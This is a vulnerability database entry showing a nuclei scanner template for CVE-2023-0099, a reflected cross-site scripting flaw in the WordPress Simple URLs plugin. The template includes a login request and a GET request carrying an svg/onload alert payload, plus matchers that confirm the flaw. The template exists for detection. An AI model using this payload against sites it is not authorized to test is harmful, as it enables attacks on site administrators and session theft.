Lucene search
K

Simple URLs < 115 - Cross Site Scripting

🗓️ 01 Jul 2026 03:36:47Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 25 Views

Simple URLs < 115 - Cross Site Scripting vulnerability. Allows session hijacking, site defacement, data theft, and potential remote code execution. Fixed in version 115

Related
Refs
Code
id: CVE-2023-0099

info:
  name: Simple URLs < 115 - Cross Site Scripting
  author: r3Y3r53
  severity: medium
  description: |
    The plugin does not sanitise and escape some parameters before outputting them back in some pages, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin.
  impact: |
    Successful exploitation of this vulnerability can lead to session hijacking, defacement of websites, theft of sensitive information, and potential remote code execution.
  remediation: Fixed in version 115
  reference:
    - https://wpscan.com/vulnerability/fd50f2d6-e420-4220-b485-73f33227e8f8
    - https://wordpress.org/plugins/simple-urls/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-0099
    - http://packetstormsecurity.com/files/176983/WordPress-Simple-URLs-Cross-Site-Scripting.html
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-0099
    cwe-id: CWE-79
    epss-score: 0.01726
    epss-percentile: 0.74686
    cpe: cpe:2.3:a:getlasso:simple_urls:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: getlasso
    product: simple_urls
    framework: wordpress
  tags: wpscan,packetstorm,cve,cve2023,xss,simple-urls,authenticated,wordpress,wp,wp-plugin,getlasso,vuln

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In
      - |
        GET /wp-content/plugins/simple-urls/admin/assets/js/import-js.php?search=%3C/script%3E%3Csvg/onload=alert(document.domain)%3E HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code_2 == 200'
          - 'contains(body, "</script><svg/onload=alert(document.domain)>")'
          - 'contains(body_2, "search_term")'
        condition: and
# digest: 4a0a0047304502210083b88b1e6507387e8fd7ce18a76578bc291eec67c8cd59e0141609bb433e047d02204b6d70dbcaace5c433dbcbb6eb5fb11dbb707df1c55d8a4cca2e32076315801d:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.3Medium risk
Vulners AI Score6.3
CVSS 3.16.1
EPSS0.01726
SSVC
25